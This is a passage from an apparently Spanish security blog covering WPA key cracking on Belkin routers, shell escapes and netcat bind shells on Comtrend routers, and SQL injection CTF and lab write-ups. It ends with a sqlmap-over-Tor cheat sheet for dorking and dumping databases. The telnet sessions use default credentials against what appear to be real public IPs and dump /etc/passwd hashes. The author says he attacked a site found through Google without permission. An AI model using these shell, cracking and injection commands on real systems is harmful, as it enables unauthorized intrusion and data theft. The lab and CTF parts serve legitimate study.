Generating dictionary stats for /wordlist/WPA/belkin.txt: 2216683512 bytes (5.73%), 246298168 words, 24629816
<SNIPPED>
Generated dictionary stats for /wordlist/WPA/belkin.txt: 38654705664 bytes, 4294967296 words, 4294967296 keyspace                    

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: oclHashcat-plus
Status.........: Running
Input.Mode.....: File (/wordlist/WPA/belkin.txt)
Hash.Target....: belkin.43a2 (94:44:XX:YY:35:a1 <-> WW:ZZ:71:3d:b9:7a)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Jul 29 05:31:56 2013 (12 secs)
Time.Estimated.: Mon Jul 29 10:48:33 2013 (5 hours, 9 mins)
Speed.GPU.#1...:   116.8k/s
Speed.GPU.#2...:   119.2k/s
Speed.GPU.#*...:   236.0k/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 2867200/4294967296 (0.07%)
Rejected.......: 0/2867200 (0.00%)
HWMon.GPU.#1...: 97% Util, 46c Temp, 35% Fan
HWMon.GPU.#2...: 97% Util, 41c Temp, 35% Fan

[s]tatus [p]ause [r]esume [b]ypass [q]uit => 

belkin.43a2:648466c7                         

Session.Name...: oclHashcat-plus
Status.........: Cracked
Input.Mode.....: File (/wordlist/WPA/belkin.txt)
Hash.Target....: belkin.43a2 (94:44:XX:YY:35:a1 <-> WW:ZZ:71:3d:b9:7a)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Jul 29 05:31:56 2013 (1 hour, 59 mins)
Speed.GPU.#1...:   118.1k/s
Speed.GPU.#2...:   118.5k/s
Speed.GPU.#*...:   236.7k/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 1686405120/4294967296 (39.26%)
Rejected.......: 0/1686405120 (0.00%)
HWMon.GPU.#1...: 87% Util, 76c Temp, 70% Fan
HWMon.GPU.#2...: 92% Util, 64c Temp, 52% Fan

Started: Mon Jul 29 05:31:56 2013
Stopped: Mon Jul 29 07:38:36 2013

The third way, directly bruteforce. Surely the best:

 ./oclHashcat-plus64.bin -m 2500 --gpu-loops=1024 ../../tocrack/belkin.hccap -a 3 -1 ?dabcdef ?1?1?1?1?1?1?1?1

Finally, we have seen how an attacker could break your security at home. So please, if you have one these routers, you should do that:

  1. Disable WPS feature.
  2. Change the WPA passphrase by default for any one using right passwords policies.

I made a video that’s suming up the process. I hope you enjoy it. I would like to congratulate for the Hashcat team for the great tools which they do. To be honest we appreciate them so much.

 

Or youtube video: http://www.youtube.com/watch?v=iyJIwr6Ca3U

 

Categories: Bruteforce, Wireless Tags:

Comtrends (I) … Got shell?

Lunes, 22 de julio de 2013 Sin comentarios

Hi everyone, finally the summer came up and also vacations. I was looking for something in some routers Comtrend, unfortunately a couple years ago, me and my colleague (Mambostar) found out how Comtrend was generating WPA keys with some of theirs routers.  They forgot to delete /var/md5encode , but we could not use a normal “ls”, so we had to find some way of listing in the filesystem. This post is the beginning of  how  bypass those restrictions and also some methods in order to got a root shell or normal shell or reverse shell. If you got new ones, please add your comment and I’ll update this post.

First of all, a simple remainder at the top of the post is required if you do not wanna read all the post.

  • Some ways of get a shell
sh
sysinfo && sh
sysinfo ; sh
echo `command`
cat | sh ( and the command that you wish in the next line)
echo `/bin/sh > /dev/tty`
echo *

 

  • How can you list files without “ls”?
for v in /* ; do echo $v ; done

 

 

  • How can you got a remote shell?

From the router:

cat | sh
/usr/bin/nc -l -p 6666 -e /bin/sh
echo `/usr/bin/nc -l -p 6666 -e /bin/sh`

From your machine/PC:

nc [IProuter] 6666

 

  • How can you send/receive files?
cat | sh
/usr/bin/nc -l -p 6666 < /etc/passwd
nc [IProuter] 6666 > /etc/passwd

comtrendOScommexec

 

 

 

Several examples in some of the most importants routers in Spain Comtrend:

Comtrend BCM96348

dudu@w0rm~:$ telnet 79.148.122.122
Trying 79.148.122.122...
Connected to 79.148.122.122.
Escape character is '^]'.
BCM96348 ADSL Router
Login: 1234
Password: 
> sh
sh: not found
> echo `ls`
echo `ls`: not found
> sysinfo && sh
Number of processes: 34
  9:00pm  up 16 days, 21:00, 
load average: 1 min:0.00, 5 min:0.00, 15 min:0.00
              total         used         free       shared      buffers
  Mem:        13912        13420          492            0          876
 Swap:            0            0            0
Total:        13912        13420          492

BusyBox v1.00 (2009.07.09-10:31+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# exit
> sysinfo ; sh
Number of processes: 34
  9:00pm  up 16 days, 21:00, 
load average: 1 min:0.00, 5 min:0.00, 15 min:0.00
              total         used         free       shared      buffers
  Mem:        13912        13428          484            0          876
 Swap:            0            0            0
Total:        13912        13428          484

BusyBox v1.00 (2009.07.09-10:31+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# 
# help

Built-in commands:
-------------------
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        date df dmesg echo expr false ifconfig init insmod kill killall
        klogd linuxrc ln logger logread md5sum mkdir mount msh ping ps
        pwd reboot rm rmmod route sendarp sh sysinfo syslogd test tftp
        tftpd top true tty vconfig

# cd /usr/bin
# ls
ls: not found
# for i in * ; do echo $i; done
[
expr
killall
logger
md5sum
test
tftp
top
tty
#

Comtrend BCM96328

dudu@w0rm~:$ telnet 187.218.86.45
Trying 187.218.86.45...
Connected to 187.218.86.45.
Escape character is '^]'.
BCM96328 Broadband Router
Login: admin
Password: 
 > sh
telnetd:error:424.175:processInput:380:unrecognized command sh
 > sysinfo ; sh
Warning: operator ; is not supported!
Number of processes: 56
 11:00pm  up 16 days, 51 min, 
load average: 1 min:0.01, 5 min:0.04, 15 min:0.01
              total         used         free       shared      buffers
  Mem:        60528        35032        25496            0         4232
 Swap:            0            0            0
Total:        60528        35032        25496
 > sysinfo && sh
Warning: operator & is not supported!
Number of processes: 56
 11:00pm  up 16 days, 51 min, 
load average: 1 min:0.01, 5 min:0.04, 15 min:0.01
              total         used         free       shared      buffers
  Mem:        60528        35056        25472            0         4232
 Swap:            0            0            0
Total:        60528        35056        25472
 > sysinfo | sh 
Number: not found
11:00pm: not found
load: not found
total: not found
Mem:: not found
Swap:: not found
Total:: not found
 > echo `ls`
bin data dev etc lib linuxrc mnt opt proc sbin sys tmp usr var webs
 > cat | sh
ls
bin      dev      lib      mnt      proc     sys      usr      webs
data     etc      linuxrc  opt      sbin     tmp      var
pwd
/
cd etc
ls
adsl                gateway.conf        passwd              smb.conf
arl                 group               ppp                 snmp
default.cfg         inetd.conf          pppmsg              soft_bridge
dhcp                init.d              profile             sysmsg
dhcp6c.conf.sample  inittab             psk.txt             udhcpd.conf
dhcp6s.conf.sample  iproute2            racoon.conf         udhcpd.leases
dms.conf            ipsec.conf          radvd.conf.sample   vlan
dyntos.sh           ipv6_start.sample   resolv.conf         wlan
ethertypes          mdk                 rsa_host_key        wrt54g.large.ico
filesystems         modules_install     samba               wrt54g.small.ico
fstab               mtab                services

 

Spawn a reverse shell

Using a netcat connection can spawn a shell:

 > cat | sh
ls
bin      dev      lib      mnt      proc     sys      usr      webs
data     etc      linuxrc  opt      sbin     tmp      var
/usr/bin/nc -l -p 6666 -e /bin/sh
 >

From our PC can connect over netcat:

$ nc  187.218.86.45 6666 
ls
bin
data
dev
etc
lib
linuxrc
mnt
opt
proc
sbin
sys
tmp
usr
var
webs
pwd
/
cat /etc/passwd
admin:PImgkYz1NIYAo:0:0:Administrator:/:/bin/sh
support:GPTPf8y46J5uo:0:0:Technical Support:/:/bin/sh
user:3SPaREpST/DNM:0:0:Normal User:/:/bin/sh
ftpuser:MNhjJatERtE5k:0:0:user for ftp:/:/bin/sh
nobody:L60iAoNSIza8k:0:0:nobody for ftp:/:/bin/sh

Finally if you got ideas how you would do command injections in these kind of routers, please feel free to discuss in comments.

Next entry I will discuss some important stuffs with those routers.

Keep hacking!  Enjoy the video ;)  Can u feel it?

Categories: Networking, Wireless Tags:

Running OclHashcat-plus with 2X hd7970

Martes, 2 de julio de 2013 Sin comentarios

The first of all, if you have not installed ATI drivers, you can follow this nice Wiki of the  Hashcat staff:

http://hashcat.net/wiki/doku.php?id=linux_server_howto#install_amd_catalyst

Secondly, if you are having problems so you can read this post:

# List all your cards
$ aticonfig --lsa
* 0. 01:00.0 AMD Radeon HD 7900 Series
  1. 02:00.0 AMD Radeon HD 7900 Series

* - Default adapter

Surely this two commands can be quite pretty useful if you are trying to use both GPU cards and they are not  working together. Or you have problems with your graphics on Ubuntu when your PC boots. Even if you got two or more GPU cards, and you attempt to change the DVI adapter, it is possible if you watch something like that: “ERROR: clGetDeviceIDs() -1″.But you are completely sure that your drivers are okay, I mean the correct version of ATI catalyst for your Hashcat’s version.

# Grab information with all adapters and it creates a new config file
$ sudo aticonfig --initial -f --adapter=all
$ sudo reboot

 

Now we have done the work, and our 2 cards are working right, for instance we can run a simple example of MD5 cracking with some of the examples of Oclhashcat-plus:

Session.Name...: oclHashcat-plus
Status.........: Exhausted
Input.Base.....: Mask (?a?a?a?a)
Input.Mod......: File (example.dict)
Hash.Target....: File (example0.hash)
Hash.Type......: MD5
Time.Started...: Mon Jul  1 20:31:03 2013 (35 secs)
Time.Estimated.: 0 secs
Speed.GPU.#1...:  3176.6M/s
Speed.GPU.#2...:  2709.5M/s
Speed.GPU.#*...:  5886.1M/s
Recovered......: 2190/6494 (33.72%) Digests, 0/1 (0.00%) Salts
Progress.......: 136302297088/136302297088 (100.00%)
Rejected.......: 1981808640/136302297088 (1.45%)
HWMon.GPU.#1...: 53% Util, 69c Temp, 36% Fan
HWMon.GPU.#2...: 37% Util, 47c Temp, 10% Fan

Started: Mon Jul  1 20:31:03 2013
Stopped: Mon Jul  1 20:31:40 2013

 

Another thing that I did, it was set up my conkyrc in order to watch my GPU clocks and another important thing like the temperature. Unfortunately, I am not a professional password cracker and use X11 as well. So my cracking server is quite homemade.

# ATI GPU0
${color orange}HASHCAT${hr 2}$color
GPU${alignr}${execi 1 aticonfig --odgc --odgt --adapter=0  | egrep -i "adapter"| head -n 1}
Graphics Clock${alignr}${execi 1  aticonfig --adapter=0 --od-getclocks |grep Clocks |cut -c 32-34} MHz
Graphics Temperature${alignr}${execi 60  aticonfig --odgc --odgt --adapter=0 | egrep -i  "temperature" | awk '// {print $5}'} °C

# ATI GPU1
GPU${alignr}${execi 1 aticonfig --odgc --odgt --adapter=1  | egrep -i "adapter"| head -n 1}
Graphics Clock${alignr}${execi 1  aticonfig --adapter=1 --od-getclocks |grep Clocks |cut -c 32-34} MHz
Graphics Temperature${alignr}${execi 60  aticonfig --odgc --odgt --adapter=1 | egrep -i  "temperature" | awk '// {print $5}'} °C

 

Example of conkyrc and hashcat running at the same time

 

If you want to use some stuffs else, you can take a look of my repository at BitBucket

I read some tips in this link:

http://hashcat.net/forum/thread-1703-post-9707.html

Categories: Bruteforce Tags:

SQLite injection: DEFCON 21 CTF Babyfirst.

Lunes, 17 de junio de 2013 Sin comentarios

This weekend was DEFCON CTF quals, unfortunately for students is not great time to play CTFs. Anyway I  attempted a simple challenge of 3dub category (web challenges).

The URL of the challenge was this :  http://babysfirst.shallweplayaga.me:8041

 

We could see a simple login with user/password. First to try is a simple bypass.

Username :  ‘ or ’1′=’1′– -

Password  :

And that is the result in the website:

babysfirst

success!

logged in as root

 

 

Well, it works but right here is not the flag. I was focused on Tamper Data and this query at response headers :

X-Sql=select name from users where name = '' or '1'='1' and password = '' or '1'='1' limit 1;

 

So,   here we go but nothing goes right, then we gotta guess further information, eg. the  union, database engine.

Username :  ‘ union select 666– -

Password  :

babysfirst

success!

logged in as 666

 

 

Great!  We notice of injection point. And we can watch the output in the web browser. I tried quite with information_schema for MySQL, all_tables for Oracle and so on……  But you didn’t obtain anything on the screen. But if we try with this SQLite payload……

Username :  ‘ union  SELECT name FROM sqlite_master– -

Password  :

babysfirst

success!

logged in as keys

 

 

And now everything is over with :

Username :   ‘ union select *  from keys– -

Password  :

babysfirst

success!

logged in as The key is: literally online lolling on line WucGesJi

 

 

Categories: SQLinjection Tags:

SQLi II: Writeup MySQL Challenges

Viernes, 22 de febrero de 2013 Sin comentarios

Hi everybody, now and maybe in the future I will start to write  my posts in English, so you must know that I can have fails with my language , anyway I would like to try it. All suggestions are welcome.

These are our solutions (me and @monstruogalleta )of the security lab about SQLinjections. Unfortunately, I cannot say much about the real website, because maybe those challenges are  online again for students. So you can imagine whatever website you think about it.

Level 0

Hint: A simple login for a banking control panel. Find a way to exploit the authentication method, and find a malformed username/password that is accepted.

In this case we find a POST method so we will try to bypass it with a simple injection (‘ or 1=1–).It is very important not forget the final space in the username field! ;) Most of the times the first user in databases is admin , so we will log in like administrators.

username    :  admin ‘ OR ’1′=’1′ –
password    :  whatever

Executing query: [SELECT username FROM users WHERE username = 'admin ' OR '1'='1' -- ' AND password = '827ccb0eea8a706c4c34a16891f84e7b']
[+]Correct password! Logged in as root!

[+]The hash to level0 is [65d3289bbf2803f9c20f7fb7c3a019a4ceac719d]

level0

Level 1

Hint: A catalog page for a webshop. Try to inject SQL into the GET-parameter ‘id’, in order to reveal the value of the level hash, stored in the field `level1hash`.`hash`. Hint: a UNION may help you here.

Firstly, we put a quote in the ‘id’ parameter and we note the output:

http://vulnerable.com:2559/level1/index.php?id=

Error during query: [SELECT id,name,description FROM products WHERE id = ']

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Now we need number of columns, so we will use ORDER BY to guess right number, you must have a look at the sequence, when we use 4 it is crashing.So we know that 3 is right.

http://vulnerable.com:2559/level1/index.php?id=1%20order%20by%201

http://vulnerable.com:2559/level1/index.php?id=1%20order%20by%202

http://vulnerable.com:2559/level1/index.php?id=1%20order%20by%203

http://vulnerable.com:2559/level1/index.php?id=1%20order%20by%204

Error during query: [SELECT id,name,description FROM products WHERE id = 1 order by 4]

Unknown column ’4′ in ‘order clause’

 

We can observe like two fields are shown on the screen, so we watch that 2 and 3 are displayed:

http://vulnerable.com:2559/level1/index.php?id=NULL%20UNION%20ALL%20SELECT%201,2,3–+

2

3

 

So we can show in the screen a few important details like:

http://vulnerable.com:2559/level1/index.php?id=NULL%20UNION%20ALL%20SELECT%201,database(),user()–+

level1

level1@localhost

 

And finally we show hash from level1hash:

http://vulnerable.com:2559/level1/index.php?id=NULL%20UNION%20SELECT%20NULL,NULL,hash%20FROM%20level1hash%20–+

b1c28c43213b4f8851f7035dbcb868fbb1a68a5a

 

Level 2

Hint: The same as the previous level, but the administrator has blacklisted SQL keywords like UNION, SELECT and some others… Can you still retrieve the hash?

Simply we have to bypass  the filter of UNION and SELECT words , so we can bypass it easily with:

http://vulnerable.com:2559/level2/index.php?id=NULL%20UNIUNIONON%20SELSELECTECT%20NULL,NULL,hash%20FROM%20level2hash%20–+

a05411cb8da8f1ab143636319c137ceca37e8b16

Level3

Hint: This one takes a different approach, the hash is now no longer located in the database but in a file named ‘keyfile’, located in /var/misc/keyfile. Lucky for you, MySQL offers a great deal of functionality!

Now we will have to encode ‘/var/misc/keyfile’ and use LOAD_FILE for reading the hash:

http://vulnerable.com:2559/level3/index.php?id=NULL%20UNION%20SELECT%20null,null,

LOAD_FILE%280x2f7661722f6d6973632f6b657966696c65%29%20–+

 57f3997083012b5321f10b8e18c074be7f655cd5

Level4

Hint: After hiring a ‘security consultant’ Diverse Technologies has patched their catalog webapp, they claim to have applied ‘best practices’ and no longer display the full query. Also, the hash is as of now located in a table with a randomized name. What we know is that the hash is in a field named ‘hash’ and that the table is in the same database as the products table.

We got  database() and columns number with the same way that in others levels, it is important here encodes level4 like 0x6c6576656c34 . You can use this url to encode, with all this now we can obtain all the random tables using GROUP_CONCAT:

http://vulnerable.com:2559/level4/index.php?id=NULL%20UNION%20SELECT%20null,null,group_concat%28table_name%29,null%20

FROM%20information_schema.tables

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,1a02904dff64258ea46e1990c990aa21,3e585ec2eb13b0f7f9086d0d93c991b0,43acbd6d0bc61a214edf761ae318ce94,5d717

But now we will use in the final something like that:  WHERE%20table_schema%20=%200x6c6576656c34

http://vulnerable.com:2559/level4/index.php?id=NULL%20UNION%20SELECT%20null,null,group_concat%28table_name%29,null%20

FROM%20information_schema.tables%20WHERE%20table_schema%20=%200x6c6576656c34

 1a02904dff64258ea46e1990c990aa21,3e585ec2eb13b0f7f9086d0d93c991b0,43acbd6d0bc61a214edf761ae318ce94,5d717b7af72b4b86b9632444c1039d06,70974c741fae1669397d79e43af0a7a5,7177ebf522f1905c527e12688fa8cd90,826eb56249042782f9faaa7be33c5736,bfc2edd146e21cb352fcc1549efd85f8,products

And now only we would have to ask to each random table for the hash, it can be the first time o the last, so you would try all the tables until to find right hash to win the level.

Level5

Hint: Since you’ve come this far already, the only hint we’ll give you is that the hash is still located in the ‘hash’ field of table with a random name, but some things have changed…

Well this challenge I just remember it was so crazy because there were a lot of random tables, finally I used sqlmap to get the hash.

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://vulnerable.com:2559/level5/index.php?id=1 --cookie=PHPSESSID=3f26c508d1417857414693b70afb89c4 --dbs

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:31:36
[13:31:36] [INFO] resuming back-end DBMS 'mysql'
[13:31:36] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2356=2356

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 3092 FROM(SELECT COUNT(*),CONCAT(0x3a647a6b3a,(SELECT (CASE WHEN (3092=3092) THEN 1 ELSE 0 END)),0x3a786d673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[13:31:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[13:31:36] [INFO] fetching database names
[13:31:37] [INFO] the SQL query used returns 2 entries
[13:31:36] [INFO] resumed: information_schema
[13:31:36] [INFO] resumed: level5
available databases [2]:
[*] information_schema
[*] level5
[13:31:37] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/vulnerable.com'
[*] shutting down at 13:31:37
root@bt:/pentest/database/sqlmap # python sqlmap.py -u http://vulnerable.com:2559/level5/index.php?id=1 --cookie=PHPSESSID=3f26c508d1417857414693b70afb89c4 -D level5 --tables --threads 5
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:31:04
[13:31:04] [INFO] resuming back-end DBMS 'mysql'
[13:31:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2356=2356
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 3092 FROM(SELECT COUNT(*),CONCAT(0x3a647a6b3a,(SELECT (CASE WHEN (3092=3092) THEN 1 ELSE 0 END)),0x3a786d673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[13:31:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[13:31:04] [INFO] fetching tables for database: 'level5'
[13:31:04] [INFO] the SQL query used returns 9 entries
[13:31:04] [INFO] starting 5 threads
[13:31:04] [INFO] resumed: 1d41a7bf4ef7c3e22209fa5f634b893c
[13:31:04] [INFO] resumed: 2201968221c2da69e5e0b505caf6beaf
[13:31:04] [INFO] resumed: 77c0fb751bab92f439856b186c42a4f3
[13:31:04] [INFO] resumed: 8c29366e3aaf6dd1d50f86a2f13bfbb9
[13:31:04] [INFO] resumed: 8f83d8236fb0bcc549eb3f4de3118907
[13:31:04] [INFO] resumed: f0f94891cd7e034efc52b485c687e5bb
[13:31:04] [INFO] resumed: fbc59e23783a8344548f20bd5b578729
[13:31:04] [INFO] resumed: products
[13:31:04] [INFO] resumed: ffeaef8dbe103dbc693d98b90dfba109
Database: level5
[9 tables]
+----------------------------------+
| 1d41a7bf4ef7c3e22209fa5f634b893c |
| 2201968221c2da69e5e0b505caf6beaf |
| 77c0fb751bab92f439856b186c42a4f3 |
| 8c29366e3aaf6dd1d50f86a2f13bfbb9 |
| 8f83d8236fb0bcc549eb3f4de3118907 |
| f0f94891cd7e034efc52b485c687e5bb |
| fbc59e23783a8344548f20bd5b578729 |
| ffeaef8dbe103dbc693d98b90dfba109 |
| products                         |
+----------------------------------+
[13:31:04] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/vulnerable.com'
[*] shutting down at 13:31:04
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://vulnerable.com:2559/level5/index.php?id=1 --cookie=PHPSESSID=3f26c508d1417857414693b70afb89c4 -D level5 -T 2201968221c2da69e5e0b505caf6beaf --dump --threads 5

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:33:11

[13:33:11] [INFO] resuming back-end DBMS 'mysql'
[13:33:11] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2356=2356

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 3092 FROM(SELECT COUNT(*),CONCAT(0x3a647a6b3a,(SELECT (CASE WHEN (3092=3092) THEN 1 ELSE 0 END)),0x3a786d673a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---

[13:33:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[13:33:11] [INFO] fetching columns for table '2201968221c2da69e5e0b505caf6beaf' in database 'level5'
[13:33:11] [INFO] the SQL query used returns 1 entries
[13:33:11] [INFO] resumed: hash
[13:33:11] [INFO] resumed: text
[13:33:11] [INFO] fetching entries for table '2201968221c2da69e5e0b505caf6beaf' in database 'level5'
[13:33:11] [INFO] the SQL query used returns 1 entries
[13:33:11] [INFO] resumed: f647e64fbcc1bce7995b084333c981baa4d57071
[13:33:11] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'hash'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: level5
Table: 2201968221c2da69e5e0b505caf6beaf
[1 entry]
+------------------------------------------+
| hash                                     |
+------------------------------------------+
| f647e64fbcc1bce7995b084333c981baa4d57071 |
+------------------------------------------+

[13:33:15] [INFO] table 'level5.2201968221c2da69e5e0b505caf6beaf' dumped to CSV file '/pentest/database/sqlmap/output/vulnerable.com/dump/level5/2201968221c2da69e5e0b505caf6beaf.csv'
[13:33:15] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/vulnerable.com'

[*] shutting down at 13:33:15
Categories: SQLinjection, Wargame-CTF Tags:

SQLi I : SQLmap & Tor (I)

Jueves, 21 de febrero de 2013 3 comentarios
sql_injection
Hi everybody, this is the first entry about SQL injections, I hope to write about automation, manual, cracking, anonymity and much more. Today I would like to discuss SQL injections using Tor SOCKS5 proxy, anyway this entry is not made for setting up Tor proxy, neither it is for explaining SQL injections, just remembering a few useful commands when you must use SQLmap and Tor.This post is just a introduction about the use of SQL injections’ automated tools and how to attempt to hide ourselves.In doing so,  I have taken a vulnerable website which I found by searching in google  because  I haven’t wanted to attack anywhere, so I have hidden real data, but anyway it is a good practical example for knowing  how to use SQLmap and Tor. That’s not legal, unless that you have permissions or any NDA or something else.
You can use Bugtraq or BackTrack, both have all you can need, I used BugTraq :) because I like it more  and Bugtraq has sqlmap version what colorize the output what you can get with BackTrack if you update it as well.
Before starting I would like to sum up the methodology in a little cheat sheet, if you have better command, please feel free to comment it.
I hope that if you have a big look at that, surely you can get the meaningful.So let’s go!
 -=====---======--------=====--==-
| Mini CheatSheet SQLmap &&   Tor | 
 -=====---======--------=====--==-
[*] Quick D0rk      inurl:*target*index.php?id=

# Dorking with SQLmap 
./sqlmap.py -g "inurl:ednolo.alumnos.upv.es*php? site:es" --batch --beep --dbs --random-agent

# Dorking with SQLmap & Tor (Not sure!)
./sqlmap.py -g "inurl:ednolo.alumnos.upv.es*php? site:es" --dbs --random-agent --tor --check-tor --tor-type=SOCKS5

# All commands are using and checking Tor, changing by random user agents and with extra time for proxies in every request 
# You can declare a variable like this : 
tor="--check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent" 
./sqlmap.py -u <url> $tor --dbs --banner 

# Check if url is vulnerable and gather info on target,also it gives us the banner 
# It will check URL to dump DB's with 5 threads and will beep if target is vulnerable.
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent --dbs --banner --beep

# It will enumerate Tables from chosen DB's with 5 threads. 
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> --tables 

# It will enumerate Colums from chosen database with 5 threads. 
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> -T <table> --columns 

# It will dump one Column data. 
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> -T <table> -C <column> --dump 

# It will dump several columns and using --batch will be automatic replies.
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> -T <table> -C <column1,column2> --dump --batch

# It will dump all tables from a database (Watch out!)
./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> --tables --dump-all --batch
Firstly, I have to say that the time has been changed in the logs! Never exists the hour 25, or 26, we know as maximum : 23:59. So you should have a look just to main idea.
In order to start, we can run the first command to find injection points, gather information on target and also it give us the banner, I have highlighted the important lines, we can sum up them in that the url is vulnerable, moreover we are using TOR with SOCKS protocol correctly ,remember that we have to force to sqlmap for using SOCKS with the flag, otherwise  we will be using HTTP proxies(Check it out with python sqlmap.py -hh).
Finally we have recovered the database names and we must have a look at payloads for understanding better injections:
# ./sqlmap.py -u "http://vulnerablesite_.com/articless.php?categoria=16" --check-tor --tor  --tor-type=SOCKS5  --time-sec=25 --threads 5 --random-agent --dbs --banner

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 25:51:22

[25:51:22] [WARNING] increasing default value for option '--time-sec' to 50 because switch '--tor' was provided
[25:51:22] [INFO] setting Tor SOCKS proxy settings
[25:51:22] [INFO] fetched random HTTP User-Agent header from file '/bugtraq/tools/web_audit/databases/sqlmap/txt/user-agents.txt': Opera/9.23 (Windows NT 5.1; U; pt)
[25:51:22] [INFO] checking Tor connection
[25:51:23] [INFO] Tor is properly being used
[25:51:23] [INFO] resuming back-end DBMS 'mysql' 
[25:51:23] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: categoria
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=16 AND 8616=8616

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: categoria=16 AND (SELECT 5911 FROM(SELECT COUNT(*),CONCAT(0x3a6779693a,(SELECT (CASE WHEN (5911=5911) THEN 1 ELSE 0 END)),0x3a7578613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: categoria=16 AND SLEEP(50)
---
[25:51:25] [INFO] the back-end DBMS is MySQL
[25:51:25] [INFO] fetching banner
[25:51:25] [INFO] resumed: 5.1.66-cll
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
banner:    '5.1.66-cll'
